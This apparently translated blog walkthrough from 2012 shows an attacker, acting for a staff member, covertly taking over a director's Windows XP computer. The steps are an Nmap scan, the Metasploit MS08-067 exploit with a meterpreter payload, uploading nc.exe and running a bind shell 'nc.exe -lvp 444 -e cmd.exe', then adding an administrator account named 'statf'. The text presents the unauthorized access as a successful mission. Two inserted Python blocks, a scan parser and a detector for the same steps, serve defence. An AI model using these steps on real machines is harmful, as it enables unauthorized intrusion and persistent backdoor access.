Backdoor Netcat With SMB
OS2C jogja (30/1-2012/02:29PM)

Good morning. Right now we will exploit a victim computer system with IP address 172.18.10.4. The attacker and the victim are on the same local area network. The attacker's IP is 172.18.10.5 and another computer is up with IP 172.18.10.1, so there are 3 computers on the LAN. The network scenario is structured as follows:

Scenario: the method the attacker uses is that the hacker, or attacker, is a delegate of the staff. The attacker received an order from a staff member to add a user account on the director's computer with the same administrator level as the director's account, so that the staff member can access the director's computer; in the office only the staff member is allowed to log in to the director's computer.

OK, next the author begins the technique for adding a user to the director's computer using an SMB exploit. First the attacker needs a tool to get information about the victim (the director's computer). Here we use Nessus to find ports, services and vulnerable applications on the computer that could be a hole the attacker can use to exploit the target. Below we can see the Nessus web application.
Next we add the target IP as the object of the scan, to find the open services and ports that are holes for exploiting the target computer. In the form below we must enter the target name, the type (run now) and the policy, choosing internal network scan. After setting the target IP we click the scan button (launch scan now); the scanning process runs and we wait for the scan output with information about the victim computer. Now we have the port, service and protocol information for the target computer. Next we can continue with the description of each service. We choose protocol TCP with port 139, which is the Server Message Block (SMB) protocol, to show the detailed info; the picture is a screenshot of the SMB information.
We can also get this information with another scanner, such as the console scanner Nmap; the difference between Nmap and Nessus is that the operation of searching for and finding open ports and services is done via the console. For example, using nmap:

nmap -A 172.18.10.4

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 07:15 AFT
Nmap scan report for 172.18.10.4
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:94:14:34 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: KITNET-02, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:94:14:34 (Cadmus Computer Systems)
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: kitnet-02
|   NetBIOS computer name: KITNET-02
|   Workgroup: WORKGROUP
|_  System time: 2012-01-30 07:15:26 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   1.95 ms 172.18.10.4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
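As an added example (not part of the original write-up), here is a defender-side parser for the nmap -A output above: it pulls out the open ports, the OS guess and the SMB NSE findings, and maps them to the exposures that the later steps depend on. NMAP_OUTPUT is a constructed excerpt of the scan output quoted above, not a live scan.

```python
import re

# Constructed excerpt of the nmap -A output quoted in the write-up, trimmed to
# the lines the checks below need (not a live scan).
NMAP_OUTPUT = """\
Nmap scan report for 172.18.10.4
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
Host script results:
| smb-security-mode:
|   Account that was used for smb scripts: guest
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")

def parse_nmap(text):
    """Return the scanned host, its open ports, the OS guess and NSE script lines."""
    scan = {"host": None, "ports": [], "os": None, "scripts": []}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if line.startswith("Nmap scan report for "):
            scan["host"] = line.split()[-1]
        elif m and m.group(3) == "open":
            port, proto, _state, service, version = m.groups()
            scan["ports"].append((int(port), proto, service, version or ""))
        elif line.startswith("OS details: "):
            scan["os"] = line[len("OS details: "):]
        elif line.startswith("|"):
            # NSE output: drop the "|", "|_" and indentation prefix
            scan["scripts"].append(line.lstrip("|_ ").strip())
    return scan

def smb_exposure_findings(scan):
    """Turn the scan facts into the exposures the write-up later relies on."""
    findings = []
    smb_ports = sorted({p for p, *_ in scan["ports"]} & {139, 445})
    if smb_ports:
        findings.append("SMB reachable on %s: restrict with host firewall or segmentation" % smb_ports)
    if scan["os"] and "Windows XP" in scan["os"]:
        findings.append("Windows XP host: confirm MS08-067 patch state, isolate or retire")
    nse = " ".join(scan["scripts"])
    if "Message signing disabled" in nse:
        findings.append("SMB signing disabled: require signed SMB traffic")
    if "doesn't support SMBv2" in nse:
        findings.append("SMBv1 only: no SMBv2/3 available")
    if "smb scripts: guest" in nse:
        findings.append("Guest account answered SMB probes: disable Guest access")
    return findings
```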
We can see nearly the same kind of information with Nessus as with Nmap, but Nmap does not give the description, plugin ID and solution. Now we will exploit the target computer:

The picture above is Metasploit; here the attacker uses the exploit framework3 on BackTrack 4 R2. Next we use the SMB exploit. We use the Server Message Block protocol (SMB) exploit exploit/windows/smb/ms08_067_netapi. Then we apply a Meterpreter payload to the SMB exploit, windows/meterpreter/reverse_tcp, and enter the target host and the attacker host: set RHOST takes the target host and set LHOST takes the attacker host.
We also have a backdoor that we will send to the target computer. After entering the target host and the attacker host and knowing where the backdoor file to send to the target is located, we run the exploit. Now the director's (target) computer is exploited; through Meterpreter we can upload and download files to and from the target computer. As the image above shows, the technique is to upload the backdoor file to the Windows system32 folder. After we type the command, the upload from the attacker's computer to system32 on the target computer succeeds. Now the attacker runs the backdoor file nc.exe from the command line of the target computer. It listens on port 444 while running. In the command nc.exe -lvp 444 -e cmd.exe that runs the backdoor, -l is listen and -p is the port, here 444; the attacker can use any port, such as 999, 888 or 555. The -v option runs the backdoor in verbose mode (use twice to be more verbose).

Now comes the mission: adding a user to the target computer. The attacker adds a new user named statf with password passtatf, and we can see the new user was added to the computer. Next the attacker gives the statf account the same access level as the director's account. In the picture below we can see it succeeded in setting the account level to administrators.
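As an added example (not part of the original write-up), the following detection logic looks for the two host-side traces of the steps above: a netcat-style listener that binds a shell (on any port, not just 444, since the text notes the port is the attacker's choice) and a freshly created account being added to the local Administrators group. EVENTS is constructed telemetry in a made-up pipe-delimited format modelled on the write-up; the event type names and fields are assumptions, not those of any particular product.

```python
from collections import defaultdict

# Constructed sample telemetry (process-creation and account events flattened to
# "type|host|field1|field2"), modelled on the write-up's steps; not real logs and
# not any product's native format.
EVENTS = [
    "ProcessCreate|KITNET-02|C:\\WINDOWS\\system32\\svchost.exe|svchost.exe -k netsvcs",
    "ProcessCreate|KITNET-02|C:\\WINDOWS\\system32\\nc.exe|nc.exe -lvp 444 -e cmd.exe",
    "UserCreated|KITNET-02|statf|",
    "GroupMemberAdded|KITNET-02|Administrators|statf",
    "ProcessCreate|KITNET-02|C:\\WINDOWS\\system32\\net.exe|net view",
]

SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "sh", "/bin/sh", "/bin/bash"}

def bind_shell_listener(cmdline):
    """True if a netcat-style command both listens (-l) and binds a shell (-e <shell>).
    Single-dash option clusters such as -lvp are expanded letter by letter, so the
    check does not depend on the port number or on how the flags are grouped."""
    tokens = cmdline.split()
    letters = set()
    exec_target = None
    for i, tok in enumerate(tokens):
        if tok.startswith("-") and not tok.startswith("--"):
            letters.update(tok[1:])
            if "e" in tok[1:] and i + 1 < len(tokens):
                exec_target = tokens[i + 1].lower()
    return "l" in letters and exec_target in SHELLS

def detect(events):
    """Return (host, reason, detail) alerts for the constructed event stream."""
    alerts = []
    new_users = defaultdict(set)  # host -> accounts created earlier in this batch
    for line in events:
        etype, host, f1, f2 = line.split("|", 3)
        if etype == "ProcessCreate" and bind_shell_listener(f2):
            alerts.append((host, "bind shell listener", f2))
        elif etype == "UserCreated":
            new_users[host].add(f1.lower())
        elif etype == "GroupMemberAdded" and f1.lower() == "administrators":
            # A brand-new account going straight to local admin is the stronger signal
            reason = ("new account promoted to local admin" if f2.lower() in new_users[host]
                      else "account added to local Administrators")
            alerts.append((host, reason, f2))
    return alerts
```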
And finally the staff member tries running nc from their own computer, to be sure they have an account on the director's computer. TRADANGggg..... the attacker's mission on the job is successfully complete.